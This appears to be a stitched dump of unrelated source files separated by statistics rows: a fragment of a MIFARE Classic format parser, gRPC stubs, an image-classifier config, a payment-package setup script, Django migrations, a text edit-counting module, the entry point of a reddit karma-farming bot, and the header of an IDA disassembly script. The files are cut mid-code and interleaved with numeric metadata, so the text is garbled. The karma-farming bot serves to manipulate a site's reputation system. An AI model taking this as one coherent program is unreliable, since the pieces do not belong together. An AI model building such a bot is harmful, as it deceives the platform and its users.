for i in range(self._parent._parent.ac_bits):
if not 'arr' in self._debug['_m_bits']:
self._debug['_m_bits']['arr'] = []
self._debug['_m_bits']['arr'].append({'start': self._io.pos()})
_t__m_bits = MifareClassic.Trailer.AccessConditions.Ac.AcBit(self.index, self._parent.chunks[i].chunk, self._io, self, self._root)
_t__m_bits._read()
self._m_bits[i] = _t__m_bits
self._debug['_m_bits']['arr'][i]['end'] = self._io.pos()
self._debug['_m_bits']['end'] = self._io.pos()
self._io.seek(_pos)
return self._m_bits if hasattr(self, '_m_bits') else None
@property
def val(self):
"""c3 c2 c1."""
if hasattr(self, '_m_val'):
return self._m_val if hasattr(self, '_m_val') else None
self._m_val = (((self.bits[2].n << 2) | (self.bits[1].n << 1)) | self.bits[0].n)
return self._m_val if hasattr(self, '_m_val') else None
@property
def inv_shift_val(self):
if hasattr(self, '_m_inv_shift_val'):
return self._m_inv_shift_val if hasattr(self, '_m_inv_shift_val') else None
self._m_inv_shift_val = (((self.bits[0].n << 2) | (self.bits[1].n << 1)) | self.bits[2].n)
return self._m_inv_shift_val if hasattr(self, '_m_inv_shift_val') else None
class ValidChunk(KaitaiStruct):
SEQ_FIELDS = []
def __init__(self, inv_chunk, chunk, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.inv_chunk = inv_chunk
self.chunk = chunk
self._debug = collections.defaultdict(dict)
def _read(self):
pass
@property
def valid(self):
if hasattr(self, '_m_valid'):
return self._m_valid if hasattr(self, '_m_valid') else None
self._m_valid = (self.inv_chunk ^ self.chunk) == 15
return self._m_valid if hasattr(self, '_m_valid') else None
@property
def data_acs(self):
if hasattr(self, '_m_data_acs'):
return self._m_data_acs if hasattr(self, '_m_data_acs') else None
_pos = self._io.pos()
self._io.seek(0)
self._debug['_m_data_acs']['start'] = self._io.pos()
self._m_data_acs = [None] * ((self._parent.acs_in_sector - 1))
for i in range((self._parent.acs_in_sector - 1)):
if not 'arr' in self._debug['_m_data_acs']:
self._debug['_m_data_acs']['arr'] = []
self._debug['_m_data_acs']['arr'].append({'start': self._io.pos()})
_t__m_data_acs = MifareClassic.Trailer.AccessConditions.DataAc(self.acs_raw[i], self._io, self, self._root)
_t__m_data_acs._read()
self._m_data_acs[i] = _t__m_data_acs
self._debug['_m_data_acs']['arr'][i]['end'] = self._io.pos()
self._debug['_m_data_acs']['end'] = self._io.pos()
self._io.seek(_pos)
return self._m_data_acs if hasattr(self, '_m_data_acs') else None
@property
def remaps(self):
if hasattr(self, '_m_remaps'):
return self._m_remaps if hasattr(self, '_m_remaps') else None
_pos = self._io.pos()
self._io.seek(0)
self._debug['_m_remaps']['start'] = self._io.pos()
self._m_remaps = [None] * (self._parent.ac_bits)
for i in range(self._parent.ac_bits):
if not 'arr' in self._debug['_m_remaps']:
self._debug['_m_remaps']['arr'] = []
self._debug['_m_remaps']['arr'].append({'start': self._io.pos()})
_t__m_remaps = MifareClassic.Trailer.AccessConditions.ChunkBitRemap(i, self._io, self, self._root)
_t__m_remaps._read()
self._m_remaps[i] = _t__m_remaps
self._debug['_m_remaps']['arr'][i]['end'] = self._io.pos()
self._debug['_m_remaps']['end'] = self._io.pos()
self._io.seek(_pos)
return self._m_remaps if hasattr(self, '_m_remaps') else None
@property
def acs_raw(self):
if hasattr(self, '_m_acs_raw'):
return self._m_acs_raw if hasattr(self, '_m_acs_raw') else None
_pos = self._io.pos()
self._io.seek(0)
self._debug['_m_acs_raw']['start'] = self._io.pos()
self._m_acs_raw = [None] * (self._parent.acs_in_sector)
for i in range(self._parent.acs_in_sector):
if not 'arr' in self._debug['_m_acs_raw']:
self._debug['_m_acs_raw']['arr'] = []
self._debug['_m_acs_raw']['arr'].append({'start': self._io.pos()})
_t__m_acs_raw = MifareClassic.Trailer.AccessConditions.Ac(i, self._io, self, self._root)
_t__m_acs_raw._read()
self._m_acs_raw[i] = _t__m_acs_raw
self._debug['_m_acs_raw']['arr'][i]['end'] = self._io.pos()
self._debug['_m_acs_raw']['end'] = self._io.pos()
self._io.seek(_pos)
return self._m_acs_raw if hasattr(self, '_m_acs_raw') else None
@property
def trailer_ac(self):
if hasattr(self, '_m_trailer_ac'):
return self._m_trailer_ac if hasattr(self, '_m_trailer_ac') else None
_pos = self._io.pos()
self._io.seek(0)
self._debug['_m_trailer_ac']['start'] = self._io.pos()
self._m_trailer_ac = MifareClassic.Trailer.AccessConditions.TrailerAc(self.acs_raw[(self._parent.acs_in_sector - 1)], self._io, self, self._root)
self._m_trailer_ac._read()
self._debug['_m_trailer_ac']['end'] = self._io.pos()
self._io.seek(_pos)
return self._m_trailer_ac if hasattr(self, '_m_trailer_ac') else None
@property
def chunks(self):
if hasattr(self, '_m_chunks'):
return self._m_chunks if hasattr(self, '_m_chunks') else None
_pos = self._io.pos()
self._io.seek(0)
self._debug['_m_chunks']['start'] = self._io.pos()
self._m_chunks = [None] * (self._parent.ac_bits)
for i in range(self._parent.ac_bits):
if not 'arr' in self._debug['_m_chunks']:
self._debug['_m_chunks']['arr'] = []
self._debug['_m_chunks']['arr'].append({'start': self._io.pos()})
_t__m_chunks = MifareClassic.Trailer.AccessConditions.ValidChunk(self.raw_chunks[self.remaps[i].inv_chunk_no], self.raw_chunks[self.remaps[i].chunk_no], self._io, self, self._root)
_t__m_chunks._read()
self._m_chunks[i] = _t__m_chunks
self._debug['_m_chunks']['arr'][i]['end'] = self._io.pos()
self._debug['_m_chunks']['end'] = self._io.pos()
self._io.seek(_pos)
return self._m_chunks if hasattr(self, '_m_chunks') else None
@property
def ac_bits(self):
if hasattr(self, '_m_ac_bits'):
return self._m_ac_bits if hasattr(self, '_m_ac_bits') else None
self._m_ac_bits = 3
return self._m_ac_bits if hasattr(self, '_m_ac_bits') else None
@property
def acs_in_sector(self):
if hasattr(self, '_m_acs_in_sector'):
return self._m_acs_in_sector if hasattr(self, '_m_acs_in_sector') else None
self._m_acs_in_sector = 4
return self._m_acs_in_sector if hasattr(self, '_m_acs_in_sector') else None
@property
def ac_count_of_chunks(self):
if hasattr(self, '_m_ac_count_of_chunks'):
return self._m_ac_count_of_chunks if hasattr(self, '_m_ac_count_of_chunks') else None
self._m_ac_count_of_chunks = (self.ac_bits * 2)
return self._m_ac_count_of_chunks if hasattr(self, '_m_ac_count_of_chunks') else None
| 46.27762 | 256 | 0.531219 | 3,975 | 32,672 | 3.947673 | 0.044528 | 0.071693 | 0.089472 | 0.096355 | 0.776064 | 0.694621 | 0.571247 | 0.516696 | 0.469093 | 0.418111 | 0 | 0.004996 | 0.350606 | 32,672 | 705 | 257 | 46.343262 | 0.7346 | 0.011202 | 0 | 0.455357 | 1 | 0 | 0.088993 | 0.018784 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117857 | false | 0.010714 | 0.007143 | 0 | 0.282143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04b55157cb70920c18083d308f8864cd831540fd | 5,325 | py | Python | umbra/common/protobuf/umbra_grpc.py | serial-coder/umbra | 156883392aad1a5af9a6ad26e07e9e3ed7102004 | [
"Apache-2.0"
] | 19 | 2018-11-19T20:31:33.000Z | 2022-03-08T11:37:21.000Z | umbra/common/protobuf/umbra_grpc.py | serial-coder/umbra | 156883392aad1a5af9a6ad26e07e9e3ed7102004 | [
"Apache-2.0"
] | 20 | 2018-11-01T18:22:33.000Z | 2021-06-17T07:00:34.000Z | umbra/common/protobuf/umbra_grpc.py | serial-coder/umbra | 156883392aad1a5af9a6ad26e07e9e3ed7102004 | [
"Apache-2.0"
] | 20 | 2018-11-07T06:10:50.000Z | 2022-03-28T19:20:59.000Z | # Generated by the Protocol Buffers compiler. DO NOT EDIT!
# source: umbra.proto
# plugin: grpclib.plugin.main
import abc
import typing
import grpclib.const
import grpclib.client
if typing.TYPE_CHECKING:
import grpclib.server
import google.protobuf.struct_pb2
import google.protobuf.timestamp_pb2
from umbra.common.protobuf import umbra_pb2
class BrokerBase(abc.ABC):
@abc.abstractmethod
async def Execute(self, stream: 'grpclib.server.Stream[umbra_pb2.Config, umbra_pb2.Report]') -> None:
pass
@abc.abstractmethod
async def Collect(self, stream: 'grpclib.server.Stream[umbra_pb2.Stats, umbra_pb2.Status]') -> None:
pass
def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
return {
'/umbra.Broker/Execute': grpclib.const.Handler(
self.Execute,
grpclib.const.Cardinality.UNARY_UNARY,
umbra_pb2.Config,
umbra_pb2.Report,
),
'/umbra.Broker/Collect': grpclib.const.Handler(
self.Collect,
grpclib.const.Cardinality.UNARY_UNARY,
umbra_pb2.Stats,
umbra_pb2.Status,
),
}
class BrokerStub:
def __init__(self, channel: grpclib.client.Channel) -> None:
self.Execute = grpclib.client.UnaryUnaryMethod(
channel,
'/umbra.Broker/Execute',
umbra_pb2.Config,
umbra_pb2.Report,
)
self.Collect = grpclib.client.UnaryUnaryMethod(
channel,
'/umbra.Broker/Collect',
umbra_pb2.Stats,
umbra_pb2.Status,
)
class ScenarioBase(abc.ABC):
@abc.abstractmethod
async def Establish(self, stream: 'grpclib.server.Stream[umbra_pb2.Workflow, umbra_pb2.Status]') -> None:
pass
@abc.abstractmethod
async def Stats(self, stream: 'grpclib.server.Stream[umbra_pb2.Workflow, umbra_pb2.Status]') -> None:
pass
def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
return {
'/umbra.Scenario/Establish': grpclib.const.Handler(
self.Establish,
grpclib.const.Cardinality.UNARY_UNARY,
umbra_pb2.Workflow,
umbra_pb2.Status,
),
'/umbra.Scenario/Stats': grpclib.const.Handler(
self.Stats,
grpclib.const.Cardinality.UNARY_UNARY,
umbra_pb2.Workflow,
umbra_pb2.Status,
),
}
class ScenarioStub:
def __init__(self, channel: grpclib.client.Channel) -> None:
self.Establish = grpclib.client.UnaryUnaryMethod(
channel,
'/umbra.Scenario/Establish',
umbra_pb2.Workflow,
umbra_pb2.Status,
)
self.Stats = grpclib.client.UnaryUnaryMethod(
channel,
'/umbra.Scenario/Stats',
umbra_pb2.Workflow,
umbra_pb2.Status,
)
class MonitorBase(abc.ABC):
@abc.abstractmethod
async def Measure(self, stream: 'grpclib.server.Stream[umbra_pb2.Directrix, umbra_pb2.Status]') -> None:
pass
def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
return {
'/umbra.Monitor/Measure': grpclib.const.Handler(
self.Measure,
grpclib.const.Cardinality.UNARY_UNARY,
umbra_pb2.Directrix,
umbra_pb2.Status,
),
}
class MonitorStub:
def __init__(self, channel: grpclib.client.Channel) -> None:
self.Measure = grpclib.client.UnaryUnaryMethod(
channel,
'/umbra.Monitor/Measure',
umbra_pb2.Directrix,
umbra_pb2.Status,
)
class AgentBase(abc.ABC):
@abc.abstractmethod
async def Probe(self, stream: 'grpclib.server.Stream[umbra_pb2.Instruction, umbra_pb2.Snapshot]') -> None:
pass
def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
return {
'/umbra.Agent/Probe': grpclib.const.Handler(
self.Probe,
grpclib.const.Cardinality.UNARY_UNARY,
umbra_pb2.Instruction,
umbra_pb2.Snapshot,
),
}
class AgentStub:
def __init__(self, channel: grpclib.client.Channel) -> None:
self.Probe = grpclib.client.UnaryUnaryMethod(
channel,
'/umbra.Agent/Probe',
umbra_pb2.Instruction,
umbra_pb2.Snapshot,
)
class CLIBase(abc.ABC):
@abc.abstractmethod
async def Inform(self, stream: 'grpclib.server.Stream[umbra_pb2.State, umbra_pb2.Status]') -> None:
pass
def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
return {
'/umbra.CLI/Inform': grpclib.const.Handler(
self.Inform,
grpclib.const.Cardinality.UNARY_UNARY,
umbra_pb2.State,
umbra_pb2.Status,
),
}
class CLIStub:
def __init__(self, channel: grpclib.client.Channel) -> None:
self.Inform = grpclib.client.UnaryUnaryMethod(
channel,
'/umbra.CLI/Inform',
umbra_pb2.State,
umbra_pb2.Status,
)
| 28.475936 | 110 | 0.589108 | 534 | 5,325 | 5.700375 | 0.14794 | 0.113009 | 0.068988 | 0.05749 | 0.71912 | 0.678712 | 0.483246 | 0.278909 | 0.278909 | 0.203351 | 0 | 0.012212 | 0.307981 | 5,325 | 186 | 111 | 28.629032 | 0.81384 | 0.019531 | 0 | 0.541667 | 1 | 0 | 0.134368 | 0.096416 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069444 | false | 0.048611 | 0.055556 | 0.034722 | 0.229167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04bc00e7e672bb917a6554d1ba2cf036a60272b6 | 3,937 | py | Python | configs_custom/mmcls/dog-vs-cat/resnet50_b32x8.py | apulis/ApulisVision | d1f226f4bc769b03c5565b9d6e76dd9823771cc7 | [
"Apache-2.0"
] | 1 | 2020-09-09T05:10:39.000Z | 2020-09-09T05:10:39.000Z | configs_custom/mmcls/dog-vs-cat/resnet50_b32x8.py | apulis/ApulisVision | d1f226f4bc769b03c5565b9d6e76dd9823771cc7 | [
"Apache-2.0"
] | null | null | null | configs_custom/mmcls/dog-vs-cat/resnet50_b32x8.py | apulis/ApulisVision | d1f226f4bc769b03c5565b9d6e76dd9823771cc7 | [
"Apache-2.0"
] | 1 | 2021-03-31T02:00:13.000Z | 2021-03-31T02:00:13.000Z | model = dict(
type='ImageClassifier',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(3, ),
style='pytorch'),
neck=dict(type='GlobalAveragePooling'),
head=dict(
type='LinearClsHead',
num_classes=1000,
in_channels=2048,
loss=dict(type='CrossEntropyLoss', loss_weight=1.0),
topk=(1, 5)))
dataset_type = 'ImageNet'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='RandomResizedCrop', size=224),
dict(type='RandomFlip', flip_prob=0.5, direction='horizontal'),
dict(
type='Normalize',
mean=[123.675, 116.28, 103.53],
std=[58.395, 57.12, 57.375],
to_rgb=True),
dict(type='ImageToTensor', keys=['img']),
dict(type='ToTensor', keys=['gt_label']),
dict(type='Collect', keys=['img', 'gt_label'])
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='Resize', size=(256, -1)),
dict(type='CenterCrop', crop_size=224),
dict(
type='Normalize',
mean=[123.675, 116.28, 103.53],
std=[58.395, 57.12, 57.375],
to_rgb=True),
dict(type='ImageToTensor', keys=['img']),
dict(type='ToTensor', keys=['gt_label']),
dict(type='Collect', keys=['img', 'gt_label'])
]
data = dict(
samples_per_gpu=32,
workers_per_gpu=2,
train=dict(
type='ImageNet',
data_prefix='data/dog-vs-cat/dog-vs-cat/',
pipeline=[
dict(type='LoadImageFromFile'),
dict(type='RandomResizedCrop', size=224),
dict(type='RandomFlip', flip_prob=0.5, direction='horizontal'),
dict(
type='Normalize',
mean=[123.675, 116.28, 103.53],
std=[58.395, 57.12, 57.375],
to_rgb=True),
dict(type='ImageToTensor', keys=['img']),
dict(type='ToTensor', keys=['gt_label']),
dict(type='Collect', keys=['img', 'gt_label'])
]),
val=dict(
type='ImageNet',
data_prefix='data/dog-vs-cat/dogs-vs-cats/val',
ann_file=None,
pipeline=[
dict(type='LoadImageFromFile'),
dict(type='Resize', size=(256, -1)),
dict(type='CenterCrop', crop_size=224),
dict(
type='Normalize',
mean=[123.675, 116.28, 103.53],
std=[58.395, 57.12, 57.375],
to_rgb=True),
dict(type='ImageToTensor', keys=['img']),
dict(type='ToTensor', keys=['gt_label']),
dict(type='Collect', keys=['img', 'gt_label'])
]),
test=dict(
type='ImageNet',
data_prefix='data/dog-vs-cat/dogs-vs-cats/val',
ann_file=None,
pipeline=[
dict(type='LoadImageFromFile'),
dict(type='Resize', size=(256, -1)),
dict(type='CenterCrop', crop_size=224),
dict(
type='Normalize',
mean=[123.675, 116.28, 103.53],
std=[58.395, 57.12, 57.375],
to_rgb=True),
dict(type='ImageToTensor', keys=['img']),
dict(type='ToTensor', keys=['gt_label']),
dict(type='Collect', keys=['img', 'gt_label'])
]))
evaluation = dict(interval=1, metric='accuracy')
optimizer = dict(type='SGD', lr=0.1, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=None)
lr_config = dict(policy='step', step=[30, 60, 90])
total_epochs = 100
checkpoint_config = dict(interval=1)
log_config = dict(
interval=500,
hooks=[dict(type='TextLoggerHook'),
dict(type='TensorboardLoggerHook')])
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
work_dir = './work_dirs/resnet50_b32x8'
gpu_ids = range(0, 1)
| 34.234783 | 77 | 0.554991 | 483 | 3,937 | 4.409938 | 0.285714 | 0.17277 | 0.028169 | 0.03662 | 0.669953 | 0.669953 | 0.669953 | 0.669953 | 0.669953 | 0.652113 | 0 | 0.090155 | 0.264669 | 3,937 | 114 | 78 | 34.535088 | 0.645596 | 0 | 0 | 0.587719 | 0 | 0 | 0.200914 | 0.035052 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04bd8ee517fa496914814f08e7ffaa7ca9bd71d8 | 1,296 | py | Python | setup.py | monim67/django-sslcommerz | 097d6946d3b61e76502a94fd73506df2b18b4b81 | [
"MIT"
] | null | null | null | setup.py | monim67/django-sslcommerz | 097d6946d3b61e76502a94fd73506df2b18b4b81 | [
"MIT"
] | null | null | null | setup.py | monim67/django-sslcommerz | 097d6946d3b61e76502a94fd73506df2b18b4b81 | [
"MIT"
] | 1 | 2022-03-05T05:45:50.000Z | 2022-03-05T05:45:50.000Z | import setuptools
def get_long_description():
with open("README.md") as file:
return file.read()
setuptools.setup(
name="django-sslcommerz",
version="1.0.0",
description="Sslcommerz for django.",
long_description=get_long_description(),
url="https://github.com/monim67/django-sslcommerz",
author="Munim Munna",
author_email="monim67@yahoo.com",
license="MIT",
keywords="sslcommerz",
packages=["django_sslcommerz", "django_sslcommerz.migrations"],
install_requires=["django>=2.0", "sslcommerz-sdk>=1.0.1"],
python_requires=">=3",
package_data={"django_sslcommerz": ["templates/*.html"]},
include_package_data=True,
classifiers=[
"Intended Audience :: Developers",
"Environment :: Web Environment",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Framework :: Django",
"Framework :: Django :: 2.0",
"Framework :: Django :: 3.0",
"Development Status :: 5 - Production/Stable",
"License :: OSI Approved :: MIT License",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Version Control :: Git",
"Topic :: Utilities",
],
)
| 32.4 | 67 | 0.625772 | 131 | 1,296 | 6.083969 | 0.572519 | 0.100376 | 0.045169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018793 | 0.219907 | 1,296 | 39 | 68 | 33.230769 | 0.769535 | 0 | 0 | 0 | 0 | 0 | 0.523148 | 0.037809 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | true | 0 | 0.028571 | 0 | 0.085714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04c12c9b2b21dff7b4710057db02ed0b2f079d26 | 441 | py | Python | src/init.py | sheepsushis/reddit-karma-farming-bot | 5330f820991adc271ae8dddbe233378f1c52acb4 | [
"MIT"
] | null | null | null | src/init.py | sheepsushis/reddit-karma-farming-bot | 5330f820991adc271ae8dddbe233378f1c52acb4 | [
"MIT"
] | null | null | null | src/init.py | sheepsushis/reddit-karma-farming-bot | 5330f820991adc271ae8dddbe233378f1c52acb4 | [
"MIT"
] | 1 | 2021-12-05T07:23:00.000Z | 2021-12-05T07:23:00.000Z | import sys
from logs.logger import log
from utils import check_internet , get_public_ip
import bot
if __name__ == "__main__":
if check_internet() is True:
try:
log.info(f'Internet connection found : {get_public_ip()}')
bot.run()
except KeyboardInterrupt:
# quit
sys.exit()
else:
log.info('Please check your internet connection')
sys.exit()
| 25.941176 | 70 | 0.591837 | 52 | 441 | 4.75 | 0.596154 | 0.105263 | 0.089069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.321995 | 441 | 16 | 71 | 27.5625 | 0.826087 | 0.00907 | 0 | 0.142857 | 0 | 0 | 0.206897 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04c9716dc9f82deec6e9854cb99ed45017c28d26 | 946 | py | Python | features/editops.py | snukky/yarescorer | 34650f744187afc06ce57874aff1089878db6e00 | [
"MIT"
] | null | null | null | features/editops.py | snukky/yarescorer | 34650f744187afc06ce57874aff1089878db6e00 | [
"MIT"
] | null | null | null | features/editops.py | snukky/yarescorer | 34650f744187afc06ce57874aff1089878db6e00 | [
"MIT"
] | null | null | null | from base import FeatureBase
from difflib import SequenceMatcher
class FeatureEdits(FeatureBase):
name = 'edits'
desc = 'counts of word-based edit operations'
def run(self, trg, src):
matcher = SequenceMatcher(None, src.split(), trg.split())
ops = [tag for tag, _, _, _, _ in matcher.get_opcodes()]
return "EditIns= {} EditDel= {} EditSub= {}" \
.format(ops.count('insert'),
ops.count('delete'),
ops.count('replace'))
class FeatureChars(FeatureBase):
name = 'charedits'
desc = 'counts of character-based edit operations'
def run(self, trg, src):
matcher = SequenceMatcher(None, src, trg)
ops = [tag for tag, _, _, _, _ in matcher.get_opcodes()]
return "CharIns= {} CharDel= {} CharSub= {}" \
.format(ops.count('insert'),
ops.count('delete'),
ops.count('replace'))
| 32.62069 | 65 | 0.570825 | 98 | 946 | 5.408163 | 0.469388 | 0.090566 | 0.045283 | 0.083019 | 0.566038 | 0.566038 | 0.566038 | 0.566038 | 0.566038 | 0.426415 | 0 | 0 | 0.291755 | 946 | 28 | 66 | 33.785714 | 0.791045 | 0 | 0 | 0.454545 | 0 | 0 | 0.210359 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
04d234c6a1d923e3aa845b6c358f8df54aee2efb | 883 | py | Python | stixy/accounting/migrations/0009_auto_20200513_0905.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | null | null | null | stixy/accounting/migrations/0009_auto_20200513_0905.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | 7 | 2021-03-19T03:10:21.000Z | 2021-09-22T19:00:19.000Z | stixy/accounting/migrations/0009_auto_20200513_0905.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | null | null | null | # Generated by Django 3.0.6 on 2020-05-13 09:05
# flake8: noqa
import accounting.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('accounting', '0008_auto_20200512_1021'),
]
operations = [
migrations.AlterField(
model_name='account',
name='account_group',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='accounting.AccountGroup', verbose_name=accounting.models._Accounting.verbose_class_name),
),
migrations.AlterField(
model_name='accountgroup',
name='account_class',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='accounting.AccountClass', verbose_name=accounting.models._Accounting.verbose_class_name),
),
]
| 33.961538 | 174 | 0.689694 | 97 | 883 | 6.103093 | 0.42268 | 0.054054 | 0.070946 | 0.111486 | 0.415541 | 0.415541 | 0.415541 | 0.415541 | 0.236486 | 0.236486 | 0 | 0.04539 | 0.201586 | 883 | 25 | 175 | 35.32 | 0.794326 | 0.065685 | 0 | 0.210526 | 1 | 0 | 0.150852 | 0.083942 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.157895 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04d422e0ed33ea11793b1e0b3c99514faee79969 | 609 | py | Python | reo/migrations/0116_auto_20210818_2124.py | NREL/REopt_Lite_API | 7cd3afeb135ef89cb65dde1b305e53fe321b2488 | [
"BSD-3-Clause"
] | 41 | 2020-02-21T08:25:17.000Z | 2022-01-14T23:06:42.000Z | reo/migrations/0116_auto_20210818_2124.py | NREL/reopt_api | fbc70f3b0cdeec9ee220266d6b3b0c5d64f257a6 | [
"BSD-3-Clause"
] | 167 | 2020-02-17T17:26:47.000Z | 2022-01-20T20:36:54.000Z | reo/migrations/0116_auto_20210818_2124.py | NREL/REopt_Lite_API | 7cd3afeb135ef89cb65dde1b305e53fe321b2488 | [
"BSD-3-Clause"
] | 31 | 2020-02-20T00:22:51.000Z | 2021-12-10T05:48:08.000Z | # Generated by Django 3.1.12 on 2021-08-18 21:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('reo', '0115_auto_20210810_1550'),
]
operations = [
migrations.AddField(
model_name='chpmodel',
name='supplementary_firing_efficiency',
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name='chpmodel',
name='supplementary_firing_max_steam_ratio',
field=models.FloatField(blank=True, null=True),
),
]
| 25.375 | 59 | 0.612479 | 63 | 609 | 5.746032 | 0.650794 | 0.099448 | 0.127072 | 0.149171 | 0.530387 | 0.530387 | 0.530387 | 0.320442 | 0 | 0 | 0 | 0.072893 | 0.279146 | 609 | 23 | 60 | 26.478261 | 0.751708 | 0.075534 | 0 | 0.470588 | 1 | 0 | 0.194296 | 0.160428 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04d49580568da4b9856ae2f7b9b3ef7e06b1c51d | 4,344 | py | Python | label_funcs_with_no_xrefs.py | Flygend/IDAPythonEmbeddedToolkit | 25eed67b8a67e18df5fceb362c424174128f48ae | [
"MIT"
] | 4 | 2017-06-20T06:26:57.000Z | 2022-02-12T03:50:16.000Z | label_funcs_with_no_xrefs.py | AGG2017/IDAPythonEmbeddedToolkit | da801888abf5c758bc768f2fa05779a3180a1cd6 | [
"MIT"
] | null | null | null | label_funcs_with_no_xrefs.py | AGG2017/IDAPythonEmbeddedToolkit | da801888abf5c758bc768f2fa05779a3180a1cd6 | [
"MIT"
] | 3 | 2017-07-30T03:23:06.000Z | 2018-04-29T20:05:47.000Z | ##############################################################################################
# Copyright 2017 The Johns Hopkins University Applied Physics Laboratory LLC
# All rights reserved.
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
##############################################################################################
# label_funcs_with_no_xrefs.py
# This script checks each defined function in the address range entered for cross-references.
# If there are no cross-references to the function, the prefix "noXrefs_" is added to the
# function's name. It then iterates through all functions in the code range again to identify
